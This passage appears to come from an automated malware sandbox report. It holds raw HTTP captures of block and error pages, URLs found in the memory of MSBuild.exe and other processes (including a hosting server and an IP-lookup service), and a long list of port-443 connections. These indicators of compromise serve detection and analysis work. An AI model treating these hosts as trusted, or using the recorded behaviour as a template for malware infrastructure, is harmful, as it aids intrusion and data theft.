height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 503 Service UnavailableServer: squid/5.5Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:16:36 GMTContent-Type: text/html;charset=utf-8Content-Length: 3712X-Squid-Error: ERR_CONNECT_FAIL 110Vary: Accept-LanguageContent-Language: enData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 4f 4e 54 45 4e 54 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30

Source: MSBuild.exe, 00000010.00000002.2879177243.0000000006520000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2800783288.0000000002F48000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: MSBuild.exe, 00000010.00000002.2879177243.0000000006520000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: 77EC63BDA74BD0D0E0426DC8F80085060.0.dr	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: qmgr.db.2.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: qmgr.db.2.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.2.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: qmgr.db.2.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: qmgr.db.2.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: qmgr.db.2.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: qmgr.db.2.dr	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: MSBuild.exe, 00000010.00000002.2879177243.0000000006520000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2800783288.0000000002F48000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: MSBuild.exe, 00000010.00000002.2800783288.0000000002F48000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://terminal7.veeblehosting.com
Source: MSBuild.exe, 00000010.00000002.2686476094.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://account.dyn.com/
Source: svchost.exe, 00000002.00000003.2102220606.000001E8EC3D3000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.2.dr	String found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
Source: svchost.exe, 00000002.00000003.2102220606.000001E8EC360000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.2.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
Source: qmgr.db.2.dr	String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe/C:

Source: unknown	Network traffic detected: HTTP traffic on port 61465 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58810 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58535 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 52827 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56039
Source: unknown	Network traffic detected: HTTP traffic on port 57404 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60538
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60537
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60536
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60535
Source: unknown	Network traffic detected: HTTP traffic on port 62390 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49975
Source: unknown	Network traffic detected: HTTP traffic on port 50360 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50504
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50505
Source: unknown	Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62904 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50486 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60782
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56052
Source: unknown	Network traffic detected: HTTP traffic on port 53717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54494 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 51524 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50359 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49960
Source: unknown	Network traffic detected: HTTP traffic on port 56125 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 51996 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 63279 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50511
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60796
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56066
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60795
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60794
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60793
Source: unknown	Network traffic detected: HTTP traffic on port 64008 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60792
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60791
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60799
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49955
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60797
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50524
Source: unknown	Network traffic detected: HTTP traffic on port 54151 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56227 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 59163 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62411 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 51376 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60782 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58914 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 51045 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 65072 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 58809 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown	Network traffic detected: HTTP traffic on port 55292 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 51192 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49301
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50934
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50937
Source: unknown	Network traffic detected: HTTP traffic on port 50591 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50939
Source: unknown	Network traffic detected: HTTP traffic on port 52130 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57222 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 65127 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 63267 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50941
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50946
Source: unknown	Network traffic detected: HTTP traffic on port 62812 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56229 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53032 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 51065 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62251 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 59243 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62494 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59765
Source: unknown	Network traffic detected: HTTP traffic on port 63576 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50949
Source: unknown	Network traffic detected: HTTP traffic on port 56031 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56536 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50952
Source: unknown	Network traffic detected: HTTP traffic on port 52825 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59767
Source: unknown	Network traffic detected: HTTP traffic on port 63403 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50950
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59774
Source: unknown	Network traffic detected: HTTP traffic on port 52830 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56024
Source: unknown	Network traffic detected: HTTP traffic on port 50695 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59771
Source: unknown	Network traffic detected: HTTP traffic on port 50865 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 59382 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 51298 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60792 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56028
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56029
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56033
Source: unknown	Network traffic detected: HTTP traffic on port 62686 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54094
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56030
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56031
Source: unknown	Network traffic detected: HTTP traffic on port 65348 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49989
Source: unknown	Network traffic detected: HTTP traffic on port 51201 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 51035 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52514
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53609
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50570
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50572
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53600
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50577
Source: unknown	Network traffic detected: HTTP traffic on port 49207 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58796 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61468
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61460
Source: unknown	Network traffic detected: HTTP traffic on port 52538 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61465
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59390
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63403
Source: unknown	Network traffic detected: HTTP traffic on port 62816 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50505 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64430 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62289 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57625 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58909 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62868 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52521
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50587
Source: unknown	Network traffic detected: HTTP traffic on port 53956 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56219 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50591
Source: unknown	Network traffic detected: HTTP traffic on port 51213 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56127 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59163
Source: unknown	Network traffic detected: HTTP traffic on port 51276 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51207
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50359
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52538
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51208
Source: unknown	Network traffic detected: HTTP traffic on port 56150 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50592
Source: unknown	Network traffic detected: HTTP traffic on port 59639 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50596
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51201
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50357
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50598
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51202
Source: unknown	Network traffic detected: HTTP traffic on port 55787 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50360
Source: unknown	Network traffic detected: HTTP traffic on port 63265 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53639
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54726
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50129
Source: unknown	Network traffic detected: HTTP traffic on port 50524 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55810
Source: unknown	Network traffic detected: HTTP traffic on port 62906 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51211
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50122
Source: unknown	Network traffic detected: HTTP traffic on port 55099 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53129 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50125
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51213
Source: unknown	Network traffic detected: HTTP traffic on port 56827 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 65160 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 63169 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60264 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54838 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57177
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57178
Source: unknown	Network traffic detected: HTTP traffic on port 52514 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56825 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 59390 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57188
Source: unknown	Network traffic detected: HTTP traffic on port 62684 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62908 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50476 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53639 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 63170 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62858 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50314
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49366
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49365
Source: unknown	Network traffic detected: HTTP traffic on port 65334 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58798 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62253 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58802 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49359
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50567
Source: unknown	Network traffic detected: HTTP traffic on port 55089 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51899
Source: unknown	Network traffic detected: HTTP traffic on port 62287 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62369 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49350
Source: unknown	Network traffic detected: HTTP traffic on port 53034 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62474 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50488 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50565
Source: unknown	Network traffic detected: HTTP traffic on port 50372 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59385
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59384
Source: unknown	Network traffic detected: HTTP traffic on port 51211 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56033 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59382
Source: unknown	Network traffic detected: HTTP traffic on port 62624 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61192
Source: unknown	Network traffic detected: HTTP traffic on port 56142 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61195
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56833
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55745
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50053
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52479
Source: unknown	Network traffic detected: HTTP traffic on port 50858 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55743
Source: unknown	Network traffic detected: HTTP traffic on port 65352 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 65111 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54006 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61185
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64453
Source: unknown	Network traffic detected: HTTP traffic on port 63171 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 51714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64451 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62290
Source: unknown	Network traffic detected: HTTP traffic on port 59247 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 51301 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54669
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54668
Source: unknown	Network traffic detected: HTTP traffic on port 59683 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 65329 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53583
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54670
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62287
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62288
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62289
Source: unknown	Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56532 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50075
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56858
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56610
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53588
Source: unknown	Network traffic detected: HTTP traffic on port 54316 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 65329
Source: unknown	Network traffic detected: HTTP traffic on port 51095 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 51107 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57501 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58807
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63162
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 65100
Source: unknown	Network traffic detected: HTTP traffic on port 50572 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58809
Source: unknown	Network traffic detected: HTTP traffic on port 62405 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50937 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58808
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56624
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58802
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55778
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53595
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56627
Source: unknown	Network traffic detected: HTTP traffic on port 61195 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56620
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56863
Source: unknown	Network traffic detected: HTTP traffic on port 63011 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55781
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 65334
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64002
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 65335
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64004
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 65333
Source: unknown	Network traffic detected: HTTP traffic on port 49366 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64008
Source: unknown	Network traffic detected: HTTP traffic on port 56874 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51107
Source: unknown	Network traffic detected: HTTP traffic on port 59647 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54670 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50494
Source: unknown	Network traffic detected: HTTP traffic on port 62477 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50493
Source: unknown	Network traffic detected: HTTP traffic on port 51942 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62239
Source: unknown	Network traffic detected: HTTP traffic on port 60536 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53152 -> 443
